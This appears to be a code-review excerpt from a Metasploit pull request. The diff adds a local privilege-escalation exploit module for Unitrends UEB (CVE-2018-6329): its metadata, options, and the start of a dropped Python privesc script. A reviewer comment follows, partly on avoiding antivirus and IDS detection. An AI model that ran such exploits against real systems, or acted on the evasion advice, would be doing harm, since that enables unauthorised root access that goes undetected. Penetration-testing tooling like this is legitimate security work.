modules/exploits/linux/local/ueb_priv_esc.rb

```diff
@@ -0,0 +1,175 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info, {
+      'Name'           => 'Unitrends UEB 10 Privilege Escalation',
+      'Description'    => %q{
+        It was discovered that the Unitrends Backup (UB) before 10.1.0 libbpext.so
+        authentication could be bypassed with a SQL injection, allowing a remote
+        attacker to place a privilege escalation exploit on the target system and
+        subsequently execute arbitrary commands.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Cale Smith', # @0xC413
+          'Benny Husted', # @BennyHusted
+          'Jared Arave' # @iotennui
+        ],
+      'DisclosureDate' => 'Mar 14 2018',
+      'Platform'       => 'linux',
+      'Arch'           => [ARCH_X86],
+            'References'     =>
+        [
+          ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/000006003'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-6329'],
+          ['URL', 'http://blog.redactedsec.net/exploits/2018/04/20/UEB9_tcp.html'],
+          ['EDB', '44297'],
+          ['CVE', '2018-6329'],
+        ],
+      'Targets'        =>
+        [
+          [ 'UEB <= 10.0', { } ]
+        ],
+      'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 2 },
+      'SessionTypes'   => ['shell', 'meterpreter'],
+      'DefaultTarget'  => 0
+      }
+    ))
+    register_advanced_options([
+      OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
+    ])
+  end
+
+  def exploit
+
+    ##
+    # This local privesc works by dropping the following python
+    # privesc script on the host. This script is just a local verion
+    # of this: https://www.exploit-db.com/exploits/42957/
+
+pe_script = %q{
+import socket
+import binascii
+import struct
+import time
+import sys
+from optparse import OptionParser
```

Comment:
When porting this script from python to metasploit framework,, a lot of this is code becomes unnecessary.
For instance, the `usage` statement is never printed, and therefore takes up un-needed space, as well as making an easy flag for AV or IDS.
The `-c` is always executed, so why not just use `sys.argv[1]`
The `-x` flag is never changed.  I would add an option to this module in msf to set it, then just make it a hardcoded variable.  Something similar to `XINETDPORT = "#{datastore['XINETDPORT']}"` similar to https://github.com/rapid7/metasploit-framework/pull/10663/files#diff-491e6d4287fa343279338ddf20bd311eR216